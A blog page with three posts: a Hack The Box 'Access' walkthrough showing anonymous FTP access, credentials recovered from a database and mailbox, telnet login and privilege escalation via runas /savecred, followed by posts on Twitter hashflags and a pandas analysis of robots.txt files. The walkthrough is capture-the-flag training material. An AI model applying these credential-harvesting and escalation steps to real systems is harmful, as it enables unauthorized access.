Mar 2, 2019 · 8 minute read

Recently I discovered Hack The Box, an online platform to hone your cyber security skills by practising on vulnerable VMs. The first box I solved is called Access. In this blog post I’ll walk through how I solved it. If you don’t want any spoilers, look away now!

Let’s start with an nmap scan to see what services are running on the box.

```
# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 10.10.10.98
...
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet syn-ack Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open http syn-ack Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
```

nmap has found three services running: FTP, telnet, and an HTTP server. Let’s see what’s running on the HTTP server.

It’s just a static page, showing an image. Nothing interesting, so let’s move on for now.

Anonymous FTP

nmap showed that there is an FTP server running, with anonymous login allowed. Let’s see what’s on that server.

```
# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
ftp> ls Backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> ls Engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 12:16AM 10870 Access Control.zip
226 Transfer complete.
```

There are some interesting files here. Let’s download them and analyse them.

```
# wget ftp://anonymous:[email protected] --no-passive-ftp --mirror
--2019-02-02 15:37:26-- ftp://anonymous:*password*@10.10.10.98/
 => ‘10.10.10.98/.listing’
Connecting to 10.10.10.98:21... connected.
Logging in as anonymous ... Logged in!
...
FINISHED --2019-02-02 15:37:28--
Total wall clock time: 1.8s
Downloaded: 5 files, 5.4M in 1.4s (3.99 MB/s)
```

Microsoft Access

We’ve got a .mdb file, which is a Microsoft Access database file, and a zip file. A quick look at the zip file shows it’s password protected, so we’ll have to come back to that later.

We can examine backup.mdb using MDB tools. Maybe there’s something we can use there.

```
# mdb-tables Backups/backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
```

It looks like there are a lot of autogenerated tables here, but those auth_* tables look interesting.

```
# mdb-export Backups/backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
```
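Three rows are easy to read by eye, but for a bigger table it helps to parse mdb-export’s CSV output. Here is a minimal Python sketch using the standard csv module. It assumes the export has been captured as text (the rows below are the ones shown above) and that the columns are named username and password, as they are in this table.

```python
import csv
import io

# Output of `mdb-export Backups/backup.mdb auth_user`, copied from above.
EXPORT = '''id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
'''


def credentials(export_text):
    """Return (username, password) pairs from mdb-export CSV output."""
    # DictReader uses the header row as keys and handles the quoted fields.
    reader = csv.DictReader(io.StringIO(export_text))
    return [(row["username"], row["password"]) for row in reader]


for user, password in credentials(EXPORT):
    print(f"{user}:{password}")
```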

Awesome! We’ve got credentials for engineer, and there’s a password-protected zip file in the Engineer directory. Let’s try engineer’s password, access4u@security, on the zip.

Microsoft Outlook

```
# 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz (906E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
Everything is Ok

Size: 271360
Compressed: 10870

# ls
'Access Control.pst' 'Access Control.zip'
```

That worked! Now we’ve got the mailbox backup for the engineer, but we first need to convert it to something that we can read more easily on Linux.

```
# readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
 "Access Control" - 2 items done, 0 items skipped.
```

Let’s take a peek at the engineer’s mailbox:

```
# mail -f Access\ Control.mbox
mail version v14.9.11. Type `?' for help
'/root/10.10.10.98/Engineer/Access Control.mbox': 1 message
▸O 1 [email protected] 2018-08-23 23:44 87/3112 MegaCorp Access Control System "security" account
?
[-- Message 1 -- 87 lines, 3112 bytes --]:
From "[email protected]" Thu Aug 23 23:44:07 2018
From: [email protected] <[email protected]>
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000

[-- #1.1 73/2670 multipart/alternative --]

[-- #1.1.1 15/211 text/plain, 7bit, utf-8 --]

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.

Regards,

John

[-- #1.1.2 51/2211 text/html, 7bit, us-ascii --]
?
```

Another set of credentials! I wonder what these are used for. Let’s try FTP first.

```
# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:jamie): security
331 Password required for security.
Password:
530 User cannot log in.
ftp: Login failed.
```

No dice ☹. The only other option is telnet.

Telnet

```
# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
```

We’re in! The user.txt flag should be located on security’s Desktop.

```
C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/02/2019 03:56 PM <DIR> .
02/02/2019 03:56 PM <DIR> ..
08/24/2018 07:37 PM <DIR> .yawcam
08/21/2018 10:35 PM <DIR> Contacts
08/28/2018 06:51 AM <DIR> Desktop
08/21/2018 10:35 PM <DIR> Documents
08/21/2018 10:35 PM <DIR> Downloads
08/21/2018 10:35 PM <DIR> Favorites
08/21/2018 10:35 PM <DIR> Links
08/21/2018 10:35 PM <DIR> Music
08/21/2018 10:35 PM <DIR> Pictures
08/21/2018 10:35 PM <DIR> Saved Games
08/21/2018 10:35 PM <DIR> Searches
08/24/2018 07:39 PM <DIR> Videos
 1 File(s) 964,179 bytes
 14 Dir(s) 16,745,127,936 bytes free

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018 06:51 AM <DIR> .
08/28/2018 06:51 AM <DIR> ..
08/21/2018 10:37 PM 32 user.txt
 1 File(s) 32 bytes
 2 Dir(s) 16,744,726,528 bytes free

C:\Users\security\Desktop>more user.txt
<SNIP>
```

Privilege escalation

Now that we’ve got the first flag, we need to escalate to root access—or more specifically Administrator on Windows.

The .yawcam directory looks out of the ordinary.

```
dir .yawcam
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\.yawcam

08/24/2018 07:37 PM <DIR> .
08/24/2018 07:37 PM <DIR> ..
08/23/2018 10:52 PM <DIR> 2
08/22/2018 06:49 AM 0 banlist.dat
08/23/2018 10:52 PM <DIR> extravars
08/22/2018 06:49 AM <DIR> img
08/23/2018 10:52 PM <DIR> logs
08/22/2018 06:49 AM <DIR> motion
08/22/2018 06:49 AM 0 pass.dat
08/23/2018 10:52 PM <DIR> stream
08/23/2018 10:52 PM <DIR> tmp
08/23/2018 10:34 PM 82 ver.dat
08/23/2018 10:52 PM <DIR> www
08/24/2018 07:37 PM 1,411 yawcam_settings.xml
 4 File(s) 1,493 bytes
 10 Dir(s) 16,764,841,984 bytes free
```

However, poking around in there proved fruitless. Maybe there’s a way to use it, but I couldn’t figure anything out.

Let’s keep looking.

```
C:\Users\security>cd ../

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users

02/02/2019 04:15 PM <DIR> .
02/02/2019 04:15 PM <DIR> ..
08/23/2018 11:46 PM <DIR> Administrator
02/02/2019 04:15 PM <DIR> engineer
02/02/2019 04:14 PM <DIR> Public
02/02/2019 04:16 PM <DIR> security
 0 File(s) 0 bytes
 6 Dir(s) 16,754,778,112 bytes free
```

Maybe one of the other users has something interesting we can use?

```
C:\Users>cd engineer
Access is denied.
```

I didn’t really expect that to work anyway.

```
C:\Users>cd Public

C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019 04:14 PM <DIR> .
02/02/2019 04:14 PM <DIR> ..
07/14/2009 05:06 AM <DIR> Documents
07/14/2009 04:57 AM <DIR> Downloads
07/14/2009 04:57 AM <DIR> Music
07/14/2009 04:57 AM <DIR> Pictures
07/14/2009 04:57 AM <DIR> Videos
 1 File(s) 964,179 bytes
 7 Dir(s) 16,723,468,288 bytes free
```

Wait a minute, we’re missing some of the standard Windows directories, such as Desktop. Let’s have a closer look with dir /A, which also lists hidden and system entries.

```
C:\Users\Public>dir /A
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019 04:14 PM <DIR> .
02/02/2019 04:14 PM <DIR> ..
08/28/2018 06:51 AM <DIR> Desktop
07/14/2009 04:57 AM 174 desktop.ini
07/14/2009 05:06 AM <DIR> Documents
07/14/2009 04:57 AM <DIR> Downloads
07/14/2009 02:34 AM <DIR> Favorites
07/14/2009 04:57 AM <DIR> Libraries
07/14/2009 04:57 AM <DIR> Music
07/14/2009 04:57 AM <DIR> Pictures
07/14/2009 04:57 AM <DIR> Videos
 2 File(s) 964,353 bytes
 10 Dir(s) 16,717,438,976 bytes free
```

Desktop has a much more recent modification date than everything else.

```
C:\Users\Public>cd Desktop

C:\Users\Public\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public\Desktop

08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
 1 File(s) 1,870 bytes
 0 Dir(s) 16,711,475,200 bytes free
```

That’s because there’s a shortcut there.

Now, I’m not sure of the best way to view a .lnk on cmd.exe via telnet, but this is what I came up with. If anyone knows of a better way, please let me know!

```
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
 runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
 �wN���]N�D.��Q���`�Xaccess�_���8{E�3
 O�j)�H���
 )ΰ[�_���8{E�3
 O�j)�H���
 )ΰ[� ��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
```

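It’s a bit difficult to read, but the shortcut runs runas.exe with the arguments /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe". The /savecred flag tells runas to use credentials previously saved for that account, so once the Administrator’s password has been stored, any runas /savecred call for that user runs without asking for it. We can use that.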
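If a copy of the shortcut can be moved to another machine, a strings-style scan is a tidier way to read it than `type`. Here is a minimal Python sketch. It is not the approach used above, where only cmd.exe over telnet was available. It assumes the file has been copied off the box, and the four-character minimum mirrors the default of the Unix `strings` tool.

```python
import re

MIN_LEN = 4  # same default minimum length as the Unix `strings` tool

# Runs of printable ASCII bytes.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# Runs of printable characters stored as UTF-16LE (character byte + NUL byte),
# the encoding Windows commonly uses for strings inside binary files.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(data):
    """Return printable ASCII strings, then UTF-16LE strings, found in `data`."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return found


# Usage on a local copy of the shortcut:
# with open("ZKAccess3.5 Security System.lnk", "rb") as f:
#     for s in extract_strings(f.read()):
#         print(s)
```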

```
C:\Users\Public\Desktop>runas /user:Administrator /savecred "cmd.exe /c more C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\Desktop\output.txt"
```

Did it work?

```
C:\Users\Public\Desktop>more output.txt
<SNIP>
```

Yes! From there we could generate a reverse shell using msfvenom and run that as Administrator, but I’ve got the flag so I’ll leave it there for now.

Mar 28, 2018 · 4 minute read

Have you ever tweeted out a hashtag, and discovered a small image attached to the side of it? It could be for #StPatricksDay, #MarchForOurLives, or whatever #白白白白白白白白白白 is meant to be. These are hashflags.

A hashflag, sometimes called Twitter emoji, is a small image that appears after a #hashtag for special events. They are not regular emoji, and you can only use them on the Twitter website, or the official Twitter apps.

If you’re a company, and you have enough money, you can buy your own hashflag as well! That’s exactly what Disney did for the release of Star Wars: The Last Jedi.

If you spend the money to buy a hashflag, it’s important to launch it correctly, otherwise it can flop. #白白白白白白白白白白 is an example of what not to do: at the time of writing, it has only 10 uses.

Hashflags aren’t exclusive to English, and they can help add context to a tweet in another language. I don’t speak any Russian, but I do know that this image is of BB-8!

Unfortunately hashflags are temporary, so any context they add to a tweet can sometimes be lost at a later date. Currently Twitter doesn’t provide an official API for hashflags, and there is no canonical list of currently active hashflags. @hashflaglist tracks hashflags, but it’s easy to miss one—this is where Azure Functions come in.

It turns out that on Twitter.com the list of currently active hashflags is sent as a JSON object in the HTML as initial data. All I need to do is fetch Twitter.com, and extract the JSON object from the HTML.

```
$ curl https://twitter.com -v --silent 2>&1 | grep -o -P '.{6}activeHashflags.{6}'

"activeHashflags"
```

I wrote some C# to parse and extract the activeHashflags JSON object, and store it in an Azure blob. You can find it here. Using Azure Functions I can run this code on a timer, so the Azure blob is always up to date with the latest Twitter hashflags. This means the blob can be used as an unofficial Twitter hashflags API—but I didn’t want to stop there.
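The extraction itself is a small parsing job. The post’s implementation is in C#. Purely as an illustration, here is a minimal Python sketch of the same idea. It assumes the key appears in the page as an unescaped JSON key (`"activeHashflags":`) followed by a JSON value. If the JSON sits HTML-escaped inside an attribute, it would need `html.unescape` first. The sample page is made up.

```python
import json


def extract_json_value(page, key):
    """Return the JSON value that directly follows `"key":` in a page.

    Assumes the key appears as an unescaped JSON key, followed (after
    optional whitespace) by a JSON object, array, string or number.
    """
    marker = f'"{key}":'
    start = page.find(marker)
    if start == -1:
        raise KeyError(key)
    index = start + len(marker)
    # Skip whitespace between the colon and the value.
    while index < len(page) and page[index].isspace():
        index += 1
    # raw_decode parses one JSON value and ignores whatever follows it.
    value, _ = json.JSONDecoder().raw_decode(page[index:])
    return value


sample_page = ('<script>window.__INITIAL_STATE__ = {"settings": {"activeHashflags": '
               '{"stpatricksday": "https://example.com/shamrock.png"}, "other": 1}};</script>')
print(extract_json_value(sample_page, "activeHashflags"))
```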

I wanted to solve some of the issues with hashflags around both discovery and durability. Azure Functions is the perfect platform for these small, single purpose pieces of code. I ended up writing five Azure Functions in total—all of which can be found on GitHub.

- ActiveHashflags fetches the active hashflags from Twitter, and stores them in a JSON object in an Azure Storage Blob. You can find the list of current hashflags here.
- UpdateHashflagState reads the JSON, and updates the hashflag table with the current state of each hashflag.
- StoreHashflagImage downloads the hashflag image, and stores it in a blob store.
- CreateHeroImage creates a hero image of the hashtag and hashflag.
- TweetHashflag tweets the hashtag and hero image.
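The post doesn’t say how UpdateHashflagState decides each hashflag’s state. Here is a hypothetical Python sketch of the kind of diff such a step could perform. It assumes the table can be modelled as a dictionary from hashtag to "active" or "inactive", and that the newly activated tags are the ones later steps (image, hero image, tweet) would act on. None of these names come from the actual functions.

```python
def update_states(table, active):
    """Return (new_table, newly_active) given the currently active hashtags.

    `table` maps hashtag -> "active" | "inactive" (a stand-in for the real
    hashflag table); `active` is the set of hashtags Twitter currently lists.
    The input table is not modified.
    """
    new_table = dict(table)
    newly_active = set()
    for tag in active:
        if new_table.get(tag) != "active":
            newly_active.add(tag)  # unseen, or re-activated
        new_table[tag] = "active"
    for tag, state in table.items():
        if tag not in active and state == "active":
            new_table[tag] = "inactive"  # no longer listed by Twitter
    return new_table, newly_active
```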

Say hello to @HashflagArchive!

@HashflagArchive solves both of the issues I have with hashflags: it tweets out new hashflags in the same hour they are activated on Twitter, which solves the issue of discovery; and it tweets an image of the hashtag and hashflag, which solves the issue of hashflags being temporary.

So this is great, but there’s still one issue—how to use hashflags outside of Twitter.com and the official Twitter apps. This is where the JSON blob comes in. I can build a wrapper library around that, and then using that library, build applications with Twitter hashflags. So that’s exactly what I did.

I wrote an npm package called hashflags. It’s pretty simple to use, and integrates nicely with the official twitter-text npm package.

```typescript
import { Hashflags } from 'hashflags';

let hf: Hashflags;
Hashflags.FETCH().then((val: Map<string, string>) => {
  hf = new Hashflags(val);
  console.log(hf.activeHashflags);
});
```

I wrote it in TypeScript, but it can also be used from plain old JS.

```javascript
const Hashflags = require('hashflags').Hashflags;

let hf;
Hashflags.FETCH().then(val => {
  hf = new Hashflags(val);
  console.log(hf.activeHashflags);
});
```

So there you have it, a quick introduction to Twitter hashflags via Azure Functions and an npm library. If you’ve got any questions please leave a comment below, or reach out to me on Twitter @Jamie_Magee.

Mar 22, 2018 · 6 minute read

In part one of this article, I collected robots.txt from the top 1 million sites on the web. In this article I’m going to do some analysis, and see if there’s anything interesting to find from all the files I’ve collected.

First we’ll start with some setup.

```python
%matplotlib inline

import pandas as pd
import numpy as np
import glob
import os
import matplotlib
```

Next I’m going to load the content of each file into my pandas dataframe, calculate the file size, and store that for later.

```python
# One file per domain in robots-txt/, named after the domain.
l = [filename.split('/')[1] for filename in glob.glob('robots-txt/*')]
df = pd.DataFrame(l, columns=['domain'])
# Raw contents and size in bytes of each domain's robots.txt.
df['content'] = df.apply(lambda x: open('robots-txt/' + x['domain']).read(), axis=1)
df['size'] = df.apply(lambda x: os.path.getsize('robots-txt/' + x['domain']), axis=1)
df.sample(5)
```

| | domain | content | size |
|---|---|---|---|
| 612419 | veapple.com | User-agent: *\nAllow: /\n\nSitemap: http://www... | 260 |
| 622296 | buscadortransportes.com | User-agent: *\nDisallow: /out/ | 29 |
| 147795 | dailynews360.com | User-agent: *\nAllow: /\n\nDisallow: /search/\... | 248 |
| 72823 | newfoundlandpower.com | User-agent: *\nDisallow: /Search.aspx\nDisallo... | 528 |
| 601408 | xfwed.com | #\n# robots.txt for www.xfwed.com\n# Version 3... | 201 |

File sizes





Now that we’ve done the setup, let’s see what the spread of file sizes in robots.txt is.

```python
fig = df.plot.hist(title='robots.txt file size', bins=20)
fig.set_yscale('log')
```

It looks like the majority of robots.txt files are under 250KB in size. This is really no surprise: robots.txt rules can use wildcards (though not full regular expressions), so a small ruleset can cover a lot of paths.
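Under RFC 9309 there are only two special characters in a rule’s path. `*` matches any sequence of characters, and a trailing `$` anchors the end of the path. Everything else is a literal prefix. Here is a minimal Python sketch that translates such a rule into a regular expression. The function names are made up for this example.

```python
import re


def robots_rule_to_regex(rule_path):
    """Compile a robots.txt rule path (e.g. "/*.pdf$") into a regex.

    '*' matches any sequence of characters, a trailing '$' anchors the end
    of the path, and everything else is matched literally.
    """
    anchored = rule_path.endswith("$")
    if anchored:
        rule_path = rule_path[:-1]
    body = ".*".join(re.escape(part) for part in rule_path.split("*"))
    return re.compile(body + (r"\Z" if anchored else ""))


def rule_matches(rule_path, path):
    # re.match only anchors at the start of the string, which gives prefix matching.
    return robots_rule_to_regex(rule_path).match(path) is not None


print(rule_matches("/*.pdf$", "/docs/report.pdf"))  # True
```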

Let’s take a look at the files larger than 1MB. I can think of three possibilities: they’re automatically maintained; they’re some other file masquerading as robots.txt; or the site is doing something seriously wrong.

```python
large = df[df['size'] > 10 ** 6].sort_values(by='size', ascending=False)
```

```python
import re


def count_directives(value, domain):
    content = domain['content']
    # Case-insensitive count of `value` anywhere in the file, not only at line starts.
    return len(re.findall(value, content, re.IGNORECASE))


large['disallow'] = large.apply(lambda x: count_directives('Disallow', x), axis=1)
large['user-agent'] = large.apply(lambda x: count_directives('User-agent', x), axis=1)
large['comments'] = large.apply(lambda x: count_directives('#', x), axis=1)

# The directives below are non-standard

large['crawl-delay'] = large.apply(lambda x: count_directives('Crawl-delay', x), axis=1)
# Caveat: 'Allow' also matches the "allow" inside every "Disallow",
# so this column counts both directives.
large['allow'] = large.apply(lambda x: count_directives('Allow', x), axis=1)
large['sitemap'] = large.apply(lambda x: count_directives('Sitemap', x), axis=1)
large['host'] = large.apply(lambda x: count_directives('Host', x), axis=1)

large
```

| | domain | content | size | disallow | user-agent | comments | crawl-delay | allow | sitemap | host |
|---|---|---|---|---|---|---|---|---|---|---|
| 632170 | haberborsa.com.tr | User-agent: *\nAllow: /\n\nDisallow: /?ref=\nD... | 5820350 | 71244 | 2 | 0 | 0 | 71245 | 5 | 10 |
| 23216 | miradavetiye.com | Sitemap: https://www.miradavetiye.com/sitemap_... | 5028384 | 47026 | 7 | 0 | 0 | 47026 | 2 | 0 |
| 282904 | americanrvcompany.com | Sitemap: http://www.americanrvcompany.com/site... | 4904266 | 56846 | 1 | 1 | 0 | 56852 | 2 | 0 |
| 446326 | exibart.com | User-Agent: *\nAllow: /\nDisallow: /notizia.as... | 3275088 | 61403 | 1 | 0 | 0 | 61404 | 0 | 0 |
| 579263 | sinospectroscopy.org.cn | http://www.sinospectroscopy.org.cn/readnews.ph... | 2979133 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
| 55309 | vibralia.com | # robots.txt automaticaly generated by PrestaS... | 2835552 | 39712 | 1 | 15 | 0 | 39736 | 0 | 0 |
| 124850 | oftalmolog30.ru | User-Agent: *\nHost: chuzmsch.ru\nSitemap: htt... | 2831975 | 87752 | 1 | 0 | 0 | 87752 | 2 | 2 |
| 557116 | la-viephoto.com | User-Agent:*\nDisallow:/aloha_blog/\nDisallow:... | 2768134 | 29782 | 2 | 0 | 0 | 29782 | 2 | 0 |
| 677400 | bigclozet.com | User-agent: *\nDisallow: /item/\n\nUser-agent:... | 2708717 | 51221 | 4 | 0 | 0 | 51221 | 0 | 0 |
| 621834 | tranzilla.ru | Host: tranzilla.ru\nSitemap: http://tranzilla.... | 2133091 | 27647 | 1 | 0 | 0 | 27648 | 2 | 1 |
| 428735 | autobaraholka.com | User-Agent: *\nDisallow: /registration/\nDisal... | 1756983 | 39330 | 1 | 0 | 0 | 39330 | 0 | 2 |
| 628591 | megasmokers.ru | User-agent: *\nDisallow: /*route=account/\nDis... | 1633963 | 92 | 2 | 0 | 0 | 92 | 2 | 1 |
| 647336 | valencia-cityguide.com | # If the Joomla site is installed within a fol... | 1559086 | 17719 | 1 | 12 | 0 | 17719 | 1 | 99 |
| 663372 | vetality.fr | # robots.txt automaticaly generated by PrestaS... | 1536758 | 27737 | 1 | 12 | 0 | 27737 | 0 | 0 |
| 105735 | golden-bee.ru | User-agent: Yandex\nDisallow: /*_openstat\nDis... | 1139308 | 24081 | 4 | 1 | 0 | 24081 | 0 | 1 |
| 454311 | dreamitalive.com | user-agent: google\ndisallow: /memberprofileda... | 1116416 | 34392 | 3 | 0 | 0 | 34401 | 0 | 9 |
| 245895 | gobankingrates.com | User-agent: *\nDisallow: /wp-admin/\nAllow: /w... | 1018109 | 7362 | 28 | 20 | 2 | 7363 | 0 | 0 |

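It looks like almost all of these sites are misusing Disallow. (The allow column is misleading here: matching Allow case-insensitively also counts the “allow” inside every Disallow, which is why the two columns are nearly identical.) In fact, looking at the raw files, it appears as if they list every article on the site under its own Disallow line. I can only guess that when an article is published, a corresponding line is added to robots.txt.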
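A stricter count only looks at the directive name at the start of each line, so Allow is not also found inside Disallow. Here is a minimal Python sketch. The function name is hypothetical, and it assumes each file’s text is available as a string, like the content column above.

```python
import re


def count_directive(content, directive):
    """Count lines whose directive name is exactly `directive`.

    The name must start the line (after optional spaces or tabs) and be
    followed by a colon, so 'Allow' no longer matches inside 'Disallow'
    and commented-out lines are skipped.
    """
    pattern = re.compile(
        r"^[ \t]*" + re.escape(directive) + r"[ \t]*:",
        re.IGNORECASE | re.MULTILINE,
    )
    return len(pattern.findall(content))
```

Applied to the dataframe, this would look something like `large['allow'] = large['content'].apply(lambda c: count_directive(c, 'Allow'))`. The corrected numbers aren’t reproduced here.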

Now let’s take a look at the smallest robots.txt files:

```python
small = df[df['size'] > 0].sort_values(by='size', ascending=True)

small.head(5)
```

| | domain | content | size |
|---|---|---|---|
| 336828 | iforce2d.net | \n | 1 |
| 55335 | togetherabroad.nl | \n | 1 |
| 471397 | behchat.ir | \n | 1 |
| 257727 | docteurtamalou.fr | | 1 |
| 669247 | lastminute-cottages.co.uk | \n | 1 |

There’s not really anything interesting here, so let’s take a look at some larger files.

```python
small = df[df['size'] > 10].sort_values(by='size', ascending=True)

small.head(5)
```

| | domain | content | size |
|---|---|---|---|
| 676951 | fortisbc.com | sitemap.xml | 11 |
| 369859 | aurora.com.cn | User-agent: | 11 |
| 329775 | klue.kr | Disallow: / | 11 |
| 390064 | chneic.sh.cn | Disallow: / | 11 |
| 355604 | hpi-mdf.com | Disallow: / | 11 |

Disallow: / tells all webcrawlers not to crawl anything on this site, and should (hopefully) keep it out of any search engines, but not all webcrawlers follow robots.txt.

User agents

User agents can be listed in robots.txt to either Allow or Disallow certain paths. Let’s take a look at the most common webcrawlers.

```python
from collections import Counter


def find_user_agents(content):
    # Case-sensitive: lines written as "User-Agent" are not matched.
    return re.findall(r'User-agent:? (.*)', content)


user_agent_list = [find_user_agents(x) for x in df['content']]
# Count each user agent at most once per file.
user_agent_count = Counter(x.strip() for xs in user_agent_list for x in set(xs))
user_agent_count.most_common(n=10)
```

```
[('*', 587729),
 ('Mediapartners-Google', 36654),
 ('Yandex', 29065),
 ('Googlebot', 25932),
 ('MJ12bot', 22250),
 ('Googlebot-Image', 16680),
 ('Baiduspider', 13646),
 ('ia_archiver', 13592),
 ('Nutch', 11204),
 ('AhrefsBot', 11108)]
```

It’s no surprise that the top result is a wildcard (*). Google takes spots 2, 4, and 6 with its AdSense, search, and image web crawlers respectively. It does seem a little strange to see the AdSense bot listed above the usual search web crawler. Two other large search engines’ bots are also in the top 10: Yandex and Baidu. MJ12bot is a crawler I had not heard of before, but according to its site it belongs to a UK-based SEO company, and according to some of the results about it, it doesn’t behave very well. ia_archiver is Alexa’s crawler; it is closely tied to The Internet Archive, and blocking it has long been the way to keep a site out of the Wayback Machine. Finally there is Apache Nutch, an open source web crawler that can be run by anyone.

Security by obscurity

There are certain paths that you might not want a webcrawler to know about. For example, a .git directory, htpasswd files, or parts of a site that are still in testing, and aren’t meant to be found by anyone on Google. Let’s see if there’s anything interesting.

```python
# Raw strings so that '\.' reaches the regex engine as an escaped dot.
sec_obs = [r'\.git', 'alpha', 'beta', 'secret', 'htpasswd', r'install\.php', r'setup\.php']
sec_obs_regex = re.compile('|'.join(sec_obs))


def find_security_by_obscurity(content):
    return sec_obs_regex.findall(content)


sec_obs_list = [find_security_by_obscurity(x) for x in df['content']]
# Count each match at most once per file.
sec_obs_count = Counter(x.strip() for xs in sec_obs_list for x in set(xs))
sec_obs_count.most_common(10)
```

```
[('install.php', 28925),
 ('beta', 2834),
 ('secret', 753),
 ('alpha', 597),
 ('.git', 436),
 ('setup.php', 73),
 ('htpasswd', 45)]
```

